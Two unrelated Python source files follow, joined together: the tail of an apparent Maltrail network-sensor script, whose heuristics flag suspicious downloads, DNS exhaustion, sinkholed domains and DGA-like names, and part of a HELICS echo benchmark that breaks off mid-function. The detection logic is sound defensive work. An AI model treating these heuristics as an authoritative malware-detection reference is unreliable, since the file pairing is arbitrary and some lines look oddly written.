_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not is_local(dst_ip) and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
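# DNS exhaustion heuristic: track distinct subdomains queried per domain (counters reset hourly); exceeding DNS_EXHAUSTION_THRESHOLD within a short window is reported as potential DNS exhaustion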
if (sec - (_subdomains_sec or 0)) > HOURLY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = _set()
subdomains._start = sec
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if sec - subdomains._start > 60:
subdomains._start = sec
subdomains.clear()
elif len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs
if not any(_ in subdomains for _ in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if addr_port(dst_ip, dst_port) in trails:
trail = addr_port(dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
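# NO_SUCH_NAME_COUNTERS maps a query (or wildcarded domain) to [hour bucket, hit count, set of queried names]; exceeding NO_SUCH_NAME_PER_HOUR_THRESHOLD triggers an "excessive no such domain" event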
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
trail = "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:])
if not any(subdomain in trail for subdomain in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
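# DGA heuristic for "no such name" replies on bare second-level domains: flag the leftmost label when its Shannon entropy (-sum(p * log2(p))) or consonant count exceeds the configured thresholds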
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1 and not config.profile:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.offline:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.offline or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if "static" in trails[trail][1]:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except re.error:
pass
else:
if re.escape(trail) != trail:
index = _regex.count("(?P<g")
if index < 100: # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
_regex += "|(?P<g%s>%s)" % (index, trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with root privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3])
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.__name__ = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if IS_WIN or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.LOGSTASH_SERVER and not len(config.LOGSTASH_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'LOGSTASH_SERVER' ('%s')" % config.LOGSTASH_SERVER)
if config.REMOTE_SEVERITY_REGEX:
try:
re.compile(config.REMOTE_SEVERITY_REGEX)
except re.error:
exit("[!] invalid configuration value for 'REMOTE_SEVERITY_REGEX' ('%s')" % config.REMOTE_SEVERITY_REGEX)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _multiprocessing
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
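# Zero-fill the shared capture buffer in MMAP_ZFILL_CHUNK_LENGTH-sized chunks, then rewind it before handing it to the worker processes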
_ = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
_n = _multiprocessing.Value('L', lock=False)
try:
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
except TypeError: # Note: https://github.com/stamparm/maltrail/issues/11823
_buffer = None
_multiprocessing = None
else:
print("[i] created %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[^] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink, single=True)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in (b"\x00\x21", b"\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif datalink == pcapy.DLT_NULL:
if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
else:
sec, usec = header.getts()
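# In multiprocessing mode the packet is serialized as (seconds, microseconds, IP offset) + payload into the shared buffer and consumed by worker processes; otherwise it is processed inline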
if _multiprocessing:
block = struct.pack("=III", sec, usec, ip_offset) + packet
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, block)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
#
# NOTE: currently an issue with pcapy-png and loop()
#
# if six.PY3 and not config.pcap_file: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
# def _loop_handler(header, packet):
# packet_handler(datalink, header, packet)
#
# _cap.loop(-1, _loop_handler)
# else:
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if config.profile and len(_caps) == 1:
print("[=] will store profiling results to '%s'..." % config.profile)
_(_caps[0])
else:
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
if not config.pcap_file:
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] cleaning up...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
if config.pcap_file:
flush_condensed_events(True)
def main():
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-q":
sys.stdout = open(os.devnull, 'w')
if sys.argv[i] == "-i":
for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
print("%s (sensor) #v%s {%s}\n" % (NAME, VERSION, HOMEPAGE))
if "--version" in sys.argv:
raise SystemExit
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-r", dest="pcap_file", help="pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("-q", "--quiet", dest="quiet", action="store_true", help="turn off regular output")
parser.add_option("--console", dest="console", action="store_true", help="print events to console")
parser.add_option("--offline", dest="offline", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
patch_parser(parser)
options, _ = parser.parse_args()
print("[*] starting @ %s\n" % time.strftime("%X /%Y-%m-%d/"))
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with root privileges" % __file__)
try:
init()
if config.profile:
open(config.profile, "w+b").write("")
cProfile.run("monitor()", config.profile)
else:
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
code = 0
try:
main()
except SystemExit as ex:
if isinstance(get_ex_message(ex), six.string_types) and get_ex_message(ex).strip('0'):
print(get_ex_message(ex))
code = 1
except IOError:
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
code = 1
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
code = 1
finally:
if not any(_ in sys.argv for _ in ("--version", "-h", "--help")):
print("\n[*] ending @ %s" % time.strftime("%X /%Y-%m-%d/"))
os._exit(code)
|
echoBenchmarks_py.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 11 09:59:05 2020
Performs the echo benchmark for the current HELICS version. It provides some
performance results of HELICS for a single core and multiple cores for a
variety of core types.
The command line arguments for the script can be found in the code
following the "if __name__ == '__main__':" line
at the end of this file.
@author: barn553
"""
import helics as h
import sys
import sysconfig
import os
import argparse
import pprint
import string
import random
import logging
from threading import Thread, Barrier, Timer
import json
import cpuinfo
import multiprocessing
import platform
import datetime
import time
import timeit
import psutil
# Setting up logger
logger = logging.getLogger(__name__)
# Setting up pretty printer
pp = pprint.PrettyPrinter(indent=4)
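# Benchmark layout: the EchoHub_c federate registers a "leafrx_<i>" publication and a
# "leafsend_<i>" subscription per leaf; each EchoLeaf_c federate publishes on "leafsend_<i>",
# subscribes to "leafrx_<i>", and checks that the string echoed back by the hub matches what it sent.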
class EchoHub_c:
def __init__(self):
self.finalTime = 0.1
self.vFed = None
self.pubs = []
self.subs = []
self.cnt_ = 10
self.initialized = False
self.readyToRun = False
logging.info("created the echo hub")
def call_on_ready(self, parties):
"""This function creates the barrier for running the tests with
multiple threads.
Args:
parties (int) - The number of parties for the barrier. In this
case, it is the number of federates plus 1.
Returns:
brr (barrier object) - The barrier for the test.
"""
brr = Barrier(parties)
logging.info("echo hub - created the barrier object")
return brr
def create_value_federate(self, coreName):
"""This function creates a value federate.
Args:
coreName (str) - The name of the core for creating the
value federate.
Returns:
vFed (helics federate object) - The value federate.
"""
name = "echohub Test--T"
fi = h.helicsCreateFederateInfo()
h.helicsFederateInfoSetCoreName(fi, coreName)
global vFed
vFed = h.helicsCreateValueFederate(name, fi)
logging.info("echo hub - created the value federate")
return vFed
def initialize(self, vFed, cnt):
"""This function prepares the data for running the test.
Args:
vFed (helics federate object) - The value federate.
cnt (int) - The number of leaf federates, i.e. the number of
publication/subscription pairs to register.
Returns:
(null)
"""
logging.info("echo hub - preparing the data for the run")
self.vFed = vFed
self.cnt_ = cnt
i = 0
while i < self.cnt_:
leafname = "leafrx_{}".format(i)
self.pubs.append(
h.helicsFederateRegisterGlobalPublication(
self.vFed, leafname, h.helics_data_type_string, ""
)
)
leafname2 = "leafsend_{}".format(i)
self.subs.append(h.helicsFederateRegisterSubscription(self.vFed, leafname2, ""))
i += 1
self.initialized = True
logging.info("echo hub - the data is prepared for the run")
def make_ready(self, vFed):
"""This function assert that the test is ready to execute.
Args:
vFed (helics federate object) - The value federate
Returns:
(null)
"""
logging.info("echo hub - making sure the test is ready to run")
self.vFed = vFed
if self.initialized is not True:
logging.debug("the test has not been initialized for echo hub")
raise Exception("Must initialize first")
sys.stdout.flush()
h.helicsFederateEnterExecutingModeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
sys.stdout.flush()
h.helicsFederateEnterExecutingModeComplete(self.vFed)
sys.stdout.flush()
self.readyToRun = True
logging.info("echo hub - the test is ready to run")
def _main_loop(self, vFed):
"""The main loop for running the HELICS functions.
Args:
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
self.vFed = vFed
buffer = chr(256)
cTime = h.helics_time_zero
logging.info("echo hub - starting the helics functions")
while cTime <= self.finalTime:
for i in range(0, self.cnt_):
if h.helicsInputIsUpdated(self.subs[i]):
actLen = 0
h.helicsInputGetString(self.subs[i], buffer, 256, actLen)
h.helicsPublicationPublishRaw(self.pubs[i], buffer, actLen)
h.helicsFederateRequestTimeAsync(self.vFed, self.finalTime + 0.05)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
cTime = h.helicsFederateRequestTimeComplete(self.vFed)
h.helicsFederateFinalizeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
h.helicsFederateFinalizeComplete(self.vFed)
logging.info("echo hub - the helics functions have been completed")
def run(self, parties, vFed):
"""This function executes all the above functions. This function
is what we are benchmarking to evaluate its performance.
Args:
parties (int) - The number of parties for the thread barrier.
In this case, it is the number of federates plus 1.
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
logging.info("echo hub - starting the execution of the helics functions")
self.vFed = vFed
self.parties = parties
if not self.readyToRun:
self.make_ready(self.vFed)
sys.stdout.flush()
self.call_on_ready(self.parties)
sys.stdout.flush()
self._main_loop(self.vFed)
logging.info("echo hub - finished the execution of the helics functions")
def __del__(self):
h.helicsFederateFree(self.vFed)
logging.info("echo hub - the test is done -> information is cleared")
class EchoLeaf_c:
def __init__(self):
self.vFed = None
self.pub = None
self.sub = None
self.index_ = 0
self.initialized = False
self.readyToRun = False
logging.info("created the echo leaf")
def call_on_ready(self, parties):
"""This function creates the barrier for running the tests with
multiple threads.
Args:
parties (int) - The number of parties for the barrier. In this
case, it is the number of federates plus 1.
Returns:
brr (barrier object) - The barrier for the test.
"""
brr = Barrier(parties)
logging.info("echo leaf - created the barrier object")
return brr
def create_value_federate(self, coreName, index):
"""This function creates a value federate.
Args:
coreName (str) - The name of the core for creating the
value federate.
index (int) - The number that indicates which value federate
is created and used during the test.
Returns:
vFed (helics federate object) - The value federate.
"""
name = "echoleaf_{} Test--T".format(index)
fi = h.helicsCreateFederateInfo()
h.helicsFederateInfoSetCoreName(fi, coreName)
global vFed
vFed = h.helicsCreateValueFederate(name, fi)
logging.info("echo leaf - created the value federate")
return vFed
def initialize(self, vFed, index):
"""This function prepares the data for running the test.
Args:
vFed (helics federate object) - The value federate.
index (int) - An identifying number for the name of the leaf.
Returns:
(null)
"""
logging.info("echo leaf - preparing the data for the run")
self.vFed = vFed
self.index_ = index
leafname = "leafsend_{}".format(index)
self.pub = h.helicsFederateRegisterGlobalPublication(
self.vFed, leafname, h.helics_data_type_string, ""
)
leafname2 = "leafrx_{}".format(index)
self.sub = h.helicsFederateRegisterSubscription(self.vFed, leafname2, "")
self.initialized = True
logging.info("echo leaf - the data is prepared for the run")
def make_ready(self, vFed):
"""This function assert that the test is ready to execute.
Args:
vFed (helics federate object) - The value federate
Returns:
(null)
"""
self.vFed = vFed
logging.info("echo leaf - making sure the test is ready to run")
if self.initialized is False:
raise Exception("must initizialize first")
sys.stdout.flush()
h.helicsFederateEnterExecutingModeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
sys.stdout.flush()
h.helicsFederateEnterExecutingModeComplete(self.vFed)
sys.stdout.flush()
self.readyToRun = True
logging.info("echo leaf - the test is ready to run")
def _main_loop(self, vFed):
"""The main loop for running the HELICS functions.
Args:
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
cnt = 0
txstring = "{:<100000}{:<100}".format(self.index_, "1")
tbuffer = chr(256)
itr = 5000
self.vFed = vFed
logging.info("echo leaf - starting the helics functions")
while cnt <= itr + 1:
h.helicsFederateRequestTimeAsync(self.vFed, 1.0)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
h.helicsFederateRequestTimeComplete(self.vFed)
if cnt <= itr:
h.helicsPublicationPublishString(self.pub, txstring)
if h.helicsInputIsUpdated(self.sub):
actLen = 0
h.helicsInputGetString(self.sub, tbuffer, 256, actLen)
if str(tbuffer) != txstring:
logging.error("incorrect string\n")
break
cnt += 1
h.helicsFederateFinalizeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
h.helicsFederateFinalizeComplete(self.vFed)
logging.info("echo leaf - the helics functions have been completed")
def run(self, parties, vFed):
"""This function executes all the above functions. This function
is what we are benchmarking to evaluate its performance.
Args:
